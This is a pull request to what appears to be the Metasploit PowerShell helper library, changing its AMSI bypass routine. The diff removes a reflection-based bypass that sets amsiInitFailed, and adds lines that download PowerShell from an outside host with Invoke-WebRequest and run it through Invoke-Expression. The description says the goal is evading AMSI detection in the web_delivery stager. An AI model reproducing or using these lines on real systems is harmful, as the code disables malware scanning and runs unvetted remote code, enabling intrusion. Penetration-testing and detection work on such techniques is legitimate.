### PR TITLE
change Powershell code to bypass AMSI

### DIFF
--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -91,8 +91,8 @@ module Powershell
     # @return [String] PowerShell code to bypass AMSI
     def self.bypass_amsi()
       %q{
-        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
+        $accessAMBY = Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/Generate -UseBasicParsing;
+        Invoke-Expression $accessAMBY.Content;
       }
     end
 


### PR DESCRIPTION
### implement amsi.fail API to bypass AMSI on powershell
So IIRC AMSI bypass command that used on web_delivery module is outdated and easily get caught by the AMSI itself,my idea is to implement the amsi.fail API to generate different obfuscated AMSI bypass command every time the stager is executed,cause that i propose this PR.
This is my first PR that i post so forgive me if i make something wrong